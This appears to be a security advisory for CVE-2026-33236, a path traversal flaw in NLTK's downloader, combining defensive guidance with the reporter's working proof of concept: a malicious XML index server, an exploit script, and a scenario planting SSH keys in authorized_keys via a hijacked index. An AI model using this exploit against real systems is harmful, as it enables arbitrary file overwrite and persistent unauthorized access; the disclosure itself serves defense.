CVE-2026-33236 — HIGH (CVSS 8.1) AI Security Vulnerability

CISO Take

NLTK's downloader blindly trusts attacker-controlled XML index files, enabling arbitrary file overwrite on any machine running NLP/ML pipelines that download NLTK resources at runtime. Automated training infrastructure and CI/CD pipelines using custom index URLs face direct system file compromise—including SSH key injection and credential overwrites. Audit all NLTK deployments immediately for custom server_index_url usage, pre-bake corpora into container images to eliminate runtime downloads, and enforce egress controls blocking outbound HTTP to NLTK index servers.

Affected Systems

Package	Ecosystem	Vulnerable Range	Patched
nltk	pip	<= 3.9.2	No patch

Do you use nltk? You're affected.

Severity & Risk

CVSS 3.1

8.1 / 10

EPSS

0.0%

chance of exploitation in 30 days

KEV Status

Not in KEV

Sophistication

Moderate

Recommended Action

1. Inventory: Scan all Python environments and container images for NLTK <= 3.9.2 (`pip show nltk`). 2. Patch: No official patched version released as of CVE publication—monitor https://github.com/nltk/nltk for release. 3. Workaround (preferred): Pre-download all required corpora and bake into container images; disable runtime NLTK downloads in production entirely. 4. Harden: Enforce egress firewall rules blocking outbound HTTP to NLTK index servers; require HTTPS for any external data source used by ML pipelines. 5. Audit: Search codebase for `Downloader(server_index_url=` with non-official URLs—treat as critical finding requiring immediate remediation. 6. Sandbox: Run NLP preprocessing containers with read-only bind mounts on sensitive filesystem paths (/etc, ~/.ssh, site-packages). 7. Detect: Add FIM (file integrity monitoring) alerts for writes to /etc/passwd, ~/.ssh/authorized_keys, and Python site-packages directories by ML service accounts.

Classification

Supply Chain Code Execution Framework AML.T0008.002 - Domains AML.T0010.001 - AI Software AML.T0011 - User Execution

Compliance Impact

This CVE is relevant to:

EU AI Act

Article 9 - Risk Management System

ISO 42001

A.6.2 - AI System Supply Chain

NIST AI RMF

GOVERN-6.1 - AI Supply Chain Risk Management

OWASP LLM Top 10

LLM03:2025 - Supply Chain Vulnerabilities

Technical Details

NVD Description

## Vulnerability Description The NLTK downloader does not validate the `subdir` and `id` attributes when processing remote XML index files. Attackers can control a remote XML index server to provide malicious values containing path traversal sequences (such as `../`), which can lead to: 1. **Arbitrary Directory Creation**: Create directories at arbitrary locations in the file system 2. **Arbitrary File Creation**: Create arbitrary files 3. **Arbitrary File Overwrite**: Overwrite critical system files (such as `/etc/passwd`, `~/.ssh/authorized_keys`, etc.) ## Vulnerability Principle ### Key Code Locations **1. XML Parsing Without Validation** (`nltk/downloader.py:253`) ```python self.filename = os.path.join(subdir, id + ext) ``` - `subdir` and `id` are directly from XML attributes without any validation **2. Path Construction Without Checks** (`nltk/downloader.py:679`) ```python filepath = os.path.join(download_dir, info.filename) ``` - Directly uses `filename` which may contain path traversal **3. Unrestricted Directory Creation** (`nltk/downloader.py:687`) ```python os.makedirs(os.path.join(download_dir, info.subdir), exist_ok=True) ``` - Can create arbitrary directories outside the download directory **4. File Writing Without Protection** (`nltk/downloader.py:695`) ```python with open(filepath, "wb") as outfile: ``` - Can write to arbitrary locations in the file system ### Attack Chain ``` 1. Attacker controls remote XML index server ↓ 2. Provides malicious XML: <package id="passwd" subdir="../../etc" .../> ↓ 3. Victim executes: downloader.download('passwd') ↓ 4. Package.fromxml() creates object, filename = "../../etc/passwd.zip" ↓ 5. _download_package() constructs path: download_dir + "../../etc/passwd.zip" ↓ 6. os.makedirs() creates directory: download_dir + "../../etc" ↓ 7. open(filepath, "wb") writes file to /etc/passwd.zip ↓ 8. System file is overwritten! ``` ## Impact Scope 1. **System File Overwrite** ## Reproduction Steps ### Environment Setup 1. Install NLTK ```bash pip install nltk ``` 2. Prepare malicious server and exploit script (see PoC section) ### Reproduction Process **Step 1: Start malicious server** ```bash python3 malicious_server.py ``` **Step 2: Run exploit script** ```bash python3 exploit_vulnerability.py ``` **Step 3: Verify results** ```bash ls -la /tmp/test_file.zip ``` ## Proof of Concept ### Malicious Server (malicious_server.py) ```python #!/usr/bin/env python3 """Malicious HTTP Server - Provides XML index with path traversal""" import os import tempfile import zipfile from http.server import HTTPServer, BaseHTTPRequestHandler # Create temporary directory server_dir = tempfile.mkdtemp(prefix="nltk_malicious_") # Create malicious XML (contains path traversal) malicious_xml = """<?xml version="1.0"?> <nltk_data> <packages> <package id="test_file" subdir="../../../../../../../../../tmp" url="http://127.0.0.1:8888/test.zip" size="100" unzipped_size="100" unzip="0"/> </packages> </nltk_data> """ # Save files with open(os.path.join(server_dir, "malicious_index.xml"), "w") as f: f.write(malicious_xml) with zipfile.ZipFile(os.path.join(server_dir, "test.zip"), "w") as zf: zf.writestr("test.txt", "Path traversal attack!") # HTTP Handler class Handler(BaseHTTPRequestHandler): def do_GET(self): if self.path == '/malicious_index.xml': self.send_response(200) self.send_header('Content-type', 'application/xml') self.end_headers() with open(os.path.join(server_dir, 'malicious_index.xml'), 'rb') as f: self.wfile.write(f.read()) elif self.path == '/test.zip': self.send_response(200) self.send_header('Content-type', 'application/zip') self.end_headers() with open(os.path.join(server_dir, 'test.zip'), 'rb') as f: self.wfile.write(f.read()) else: self.send_response(404) self.end_headers() def log_message(self, format, *args): pass # Start server if __name__ == "__main__": port = 8888 server = HTTPServer(("0.0.0.0", port), Handler) print(f"Malicious server started: http://127.0.0.1:{port}/malicious_index.xml") print("Press Ctrl+C to stop") try: server.serve_forever() except KeyboardInterrupt: print("\nServer stopped") ``` ### Exploit Script (exploit_vulnerability.py) ```python #!/usr/bin/env python3 """AFO Vulnerability Exploit Script""" import os import tempfile def exploit(server_url="http://127.0.0.1:8888/malicious_index.xml"): download_dir = tempfile.mkdtemp(prefix="nltk_exploit_") print(f"Download directory: {download_dir}") # Exploit vulnerability from nltk.downloader import Downloader downloader = Downloader(server_index_url=server_url, download_dir=download_dir) downloader.download("test_file", quiet=True) # Check results expected_path = "/tmp/test_file.zip" if os.path.exists(expected_path): print(f"\n✗ Exploit successful! File written to: {expected_path}") print(f"✗ Path traversal attack successful!") else: print(f"\n? File not found, download may have failed") if __name__ == "__main__": exploit() ``` ### Execution Results ``` ✗ Exploit successful! File written to: /tmp/test_file.zip ✗ Path traversal attack successful! ```

Exploitation Scenario

An adversary targeting an organization's NLP training pipeline identifies that the pipeline downloads NLTK resources at runtime against an HTTP (non-TLS) index server. The adversary performs a DNS hijack or BGP prefix hijack against the NLTK data hostname, redirecting index requests to a controlled malicious server. The malicious server returns a crafted XML with subdir='../../../.ssh' and id='authorized_keys'. When the nightly training job executes `nltk.download('punkt')`, NLTK constructs the path `download_dir + '../../../.ssh/authorized_keys.zip'`, creates the directory, and writes the attacker's crafted archive. After extraction, the attacker's SSH public key is present in authorized_keys—granting persistent, passwordless access to the ML training server, which typically holds sensitive training data, model artifacts, and credentials for internal APIs and data stores.

Weaknesses (CWE)

CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') Primary

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H

References

Timeline

Published

March 19, 2026

Last Modified

March 19, 2026

First Seen

March 24, 2026